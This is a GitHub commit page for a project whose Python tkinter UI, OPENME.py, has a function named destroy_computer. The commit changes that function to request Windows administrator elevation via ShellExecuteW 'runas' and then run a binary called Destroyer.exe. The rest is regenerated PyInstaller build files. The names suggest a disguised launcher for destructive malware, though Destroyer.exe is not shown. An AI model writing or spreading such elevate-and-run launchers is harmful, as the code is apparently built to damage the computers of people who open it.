Skip to content

Commit

Permalink
v0.1 with application under test
Browse files Browse the repository at this point in the history
  • Loading branch information
INeddHelp committed Mar 26, 2023
1 parent 978b6dd commit bef04e5
Show file tree
Hide file tree
Showing 10 changed files with 1,350 additions and 1,263 deletions.
14 changes: 12 additions & 2 deletions .scripts/.ui/OPENME.py
Original file line number Diff line number Diff line change
@@ -1,5 +1,9 @@
import tkinter as tk
import os
import subprocess
import sys
import ctypes



def delete_text():
Expand All @@ -24,8 +28,14 @@ def delete_text():


def destroy_computer():
os.startfile("Destroyer.exe")
window.destroy()
if not ctypes.windll.shell32.IsUserAnAdmin():
ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, __file__, None, 1)
else:
try:
subprocess.run("Destroyer.exe", shell=True)
except FileNotFoundError:
print("Error: Destroyer.exe not found")



def handle_button_click(button_text):
Expand Down
848 changes: 427 additions & 421 deletions .scripts/.ui/build/OPENME/Analysis-00.toc

Large diffs are not rendered by default.

840 changes: 422 additions & 418 deletions .scripts/.ui/build/OPENME/EXE-00.toc

Large diffs are not rendered by default.

Binary file modified .scripts/.ui/build/OPENME/OPENME.pkg
Binary file not shown.
838 changes: 421 additions & 417 deletions .scripts/.ui/build/OPENME/PKG-00.toc

Large diffs are not rendered by default.

Binary file modified .scripts/.ui/build/OPENME/PYZ-00.pyz
Binary file not shown.
2 changes: 2 additions & 0 deletions .scripts/.ui/build/OPENME/PYZ-00.toc
Original file line number Diff line number Diff line change
Expand Up @@ -15,6 +15,8 @@
('contextvars', '/usr/lib/python3.10/contextvars.py', 'PYMODULE'),
('copy', '/usr/lib/python3.10/copy.py', 'PYMODULE'),
('csv', '/usr/lib/python3.10/csv.py', 'PYMODULE'),
('ctypes', '/usr/lib/python3.10/ctypes/__init__.py', 'PYMODULE'),
('ctypes._endian', '/usr/lib/python3.10/ctypes/_endian.py', 'PYMODULE'),
('dataclasses', '/usr/lib/python3.10/dataclasses.py', 'PYMODULE'),
('datetime', '/usr/lib/python3.10/datetime.py', 'PYMODULE'),
('decimal', '/usr/lib/python3.10/decimal.py', 'PYMODULE'),
Expand Down
4 changes: 2 additions & 2 deletions .scripts/.ui/build/OPENME/warn-OPENME.txt
Original file line number Diff line number Diff line change
Expand Up @@ -18,9 +18,9 @@ missing module named pep517 - imported by importlib.metadata (delayed)
missing module named 'org.python' - imported by copy (optional)
missing module named org - imported by pickle (optional)
missing module named winreg - imported by importlib._bootstrap_external (conditional), mimetypes (optional), urllib.request (delayed, conditional, optional)
missing module named nt - imported by os (delayed, conditional, optional), ntpath (optional), shutil (conditional), importlib._bootstrap_external (conditional)
missing module named nt - imported by os (delayed, conditional, optional), ntpath (optional), shutil (conditional), importlib._bootstrap_external (conditional), ctypes (delayed, conditional)
missing module named _frozen_importlib_external - imported by importlib._bootstrap (delayed), importlib (optional), importlib.abc (optional)
excluded module named _frozen_importlib - imported by importlib (optional), importlib.abc (optional)
missing module named _winapi - imported by encodings (delayed, conditional, optional), ntpath (optional), subprocess (optional), mimetypes (optional)
missing module named _scproxy - imported by urllib.request (conditional)
missing module named msvcrt - imported by subprocess (optional), getpass (optional)
missing module named _winapi - imported by encodings (delayed, conditional, optional), ntpath (optional), subprocess (optional), mimetypes (optional)
67 changes: 64 additions & 3 deletions .scripts/.ui/build/OPENME/xref-OPENME.html
Original file line number Diff line number Diff line change
Expand Up @@ -25,6 +25,7 @@ <h1>modulegraph cross reference for OPENME.py, pyi_rth__tkinter.py, pyi_rth_insp
&#8226; <a href="#collections">collections</a>
&#8226; <a href="#collections.abc">collections.abc</a>
&#8226; <a href="#copyreg">copyreg</a>
&#8226; <a href="#ctypes">ctypes</a>
&#8226; <a href="#encodings">encodings</a>
&#8226; <a href="#encodings.aliases">encodings.aliases</a>
&#8226; <a href="#encodings.ascii">encodings.ascii</a>
Expand Down Expand Up @@ -169,6 +170,8 @@ <h1>modulegraph cross reference for OPENME.py, pyi_rth__tkinter.py, pyi_rth_insp
&#8226; <a href="#sre_constants">sre_constants</a>
&#8226; <a href="#sre_parse">sre_parse</a>
&#8226; <a href="#stat">stat</a>
&#8226; <a href="#subprocess">subprocess</a>
&#8226; <a href="#sys">sys</a>
&#8226; <a href="#tkinter">tkinter</a>
&#8226; <a href="#token">token</a>
&#8226; <a href="#tokenize">tokenize</a>
Expand Down Expand Up @@ -459,6 +462,16 @@ <h1>modulegraph cross reference for OPENME.py, pyi_rth__tkinter.py, pyi_rth_insp

</div>

<div class="node">
<a name="_ctypes"></a>
<tt>_ctypes</tt> <span class="moduletype"><tt>/usr/lib/python3.10/lib-dynload/_ctypes.cpython-310-x86_64-linux-gnu.so</tt></span> <div class="import">
imported by:
<a href="#ctypes">ctypes</a>

</div>

</div>

<div class="node">
<a name="_datetime"></a>
<tt>_datetime</tt> <span class="moduletype"><i>(builtin module)</i></span> <div class="import">
Expand Down Expand Up @@ -1568,6 +1581,46 @@ <h1>modulegraph cross reference for OPENME.py, pyi_rth__tkinter.py, pyi_rth_insp

</div>

<div class="node">
<a name="ctypes"></a>
<a target="code" href="/usr/lib/python3.10/ctypes/__init__.py" type="text/plain"><tt>ctypes</tt></a>
<span class="moduletype">Package</span> <div class="import">
imports:
<a href="#_ctypes">_ctypes</a>
&#8226; <a href="#ctypes._endian">ctypes._endian</a>
&#8226; <a href="#nt">nt</a>
&#8226; <a href="#os">os</a>
&#8226; <a href="#struct">struct</a>
&#8226; <a href="#sys">sys</a>
&#8226; <a href="#types">types</a>

</div>
<div class="import">
imported by:
<a href="#OPENME.py">OPENME.py</a>
&#8226; <a href="#ctypes._endian">ctypes._endian</a>

</div>

</div>

<div class="node">
<a name="ctypes._endian"></a>
<a target="code" href="/usr/lib/python3.10/ctypes/_endian.py" type="text/plain"><tt>ctypes._endian</tt></a>
<span class="moduletype">SourceModule</span> <div class="import">
imports:
<a href="#ctypes">ctypes</a>
&#8226; <a href="#sys">sys</a>

</div>
<div class="import">
imported by:
<a href="#ctypes">ctypes</a>

</div>

</div>

<div class="node">
<a name="dataclasses"></a>
<a target="code" href="/usr/lib/python3.10/dataclasses.py" type="text/plain"><tt>dataclasses</tt></a>
Expand Down Expand Up @@ -5719,7 +5772,8 @@ <h1>modulegraph cross reference for OPENME.py, pyi_rth__tkinter.py, pyi_rth_insp
<a target="code" href="" type="text/plain"><tt>nt</tt></a>
<span class="moduletype">MissingModule</span> <div class="import">
imported by:
<a href="#importlib._bootstrap_external">importlib._bootstrap_external</a>
<a href="#ctypes">ctypes</a>
&#8226; <a href="#importlib._bootstrap_external">importlib._bootstrap_external</a>
&#8226; <a href="#ntpath">ntpath</a>
&#8226; <a href="#os">os</a>
&#8226; <a href="#shutil">shutil</a>
Expand Down Expand Up @@ -5886,6 +5940,7 @@ <h1>modulegraph cross reference for OPENME.py, pyi_rth__tkinter.py, pyi_rth_insp
<a href="#OPENME.py">OPENME.py</a>
&#8226; <a href="#argparse">argparse</a>
&#8226; <a href="#bz2">bz2</a>
&#8226; <a href="#ctypes">ctypes</a>
&#8226; <a href="#email.utils">email.utils</a>
&#8226; <a href="#fnmatch">fnmatch</a>
&#8226; <a href="#genericpath">genericpath</a>
Expand Down Expand Up @@ -6596,6 +6651,7 @@ <h1>modulegraph cross reference for OPENME.py, pyi_rth__tkinter.py, pyi_rth_insp
<div class="import">
imported by:
<a href="#base64">base64</a>
&#8226; <a href="#ctypes">ctypes</a>
&#8226; <a href="#gettext">gettext</a>
&#8226; <a href="#gzip">gzip</a>
&#8226; <a href="#pickle">pickle</a>
Expand Down Expand Up @@ -6634,7 +6690,8 @@ <h1>modulegraph cross reference for OPENME.py, pyi_rth__tkinter.py, pyi_rth_insp
</div>
<div class="import">
imported by:
<a href="#os">os</a>
<a href="#OPENME.py">OPENME.py</a>
&#8226; <a href="#os">os</a>

</div>

Expand All @@ -6644,7 +6701,8 @@ <h1>modulegraph cross reference for OPENME.py, pyi_rth__tkinter.py, pyi_rth_insp
<a name="sys"></a>
<tt>sys</tt> <span class="moduletype"><i>(builtin module)</i></span> <div class="import">
imported by:
<a href="#_collections_abc">_collections_abc</a>
<a href="#OPENME.py">OPENME.py</a>
&#8226; <a href="#_collections_abc">_collections_abc</a>
&#8226; <a href="#_compression">_compression</a>
&#8226; <a href="#_pydecimal">_pydecimal</a>
&#8226; <a href="#argparse">argparse</a>
Expand All @@ -6654,6 +6712,8 @@ <h1>modulegraph cross reference for OPENME.py, pyi_rth__tkinter.py, pyi_rth_insp
&#8226; <a href="#codecs">codecs</a>
&#8226; <a href="#collections">collections</a>
&#8226; <a href="#contextlib">contextlib</a>
&#8226; <a href="#ctypes">ctypes</a>
&#8226; <a href="#ctypes._endian">ctypes._endian</a>
&#8226; <a href="#dataclasses">dataclasses</a>
&#8226; <a href="#datetime">datetime</a>
&#8226; <a href="#dis">dis</a>
Expand Down Expand Up @@ -7016,6 +7076,7 @@ <h1>modulegraph cross reference for OPENME.py, pyi_rth__tkinter.py, pyi_rth_insp
&#8226; <a href="#_weakrefset">_weakrefset</a>
&#8226; <a href="#contextlib">contextlib</a>
&#8226; <a href="#copy">copy</a>
&#8226; <a href="#ctypes">ctypes</a>
&#8226; <a href="#dataclasses">dataclasses</a>
&#8226; <a href="#dis">dis</a>
&#8226; <a href="#email.headerregistry">email.headerregistry</a>
Expand Down
Binary file modified OPENME
Binary file not shown.

0 comments on commit bef04e5

Please sign in to comment.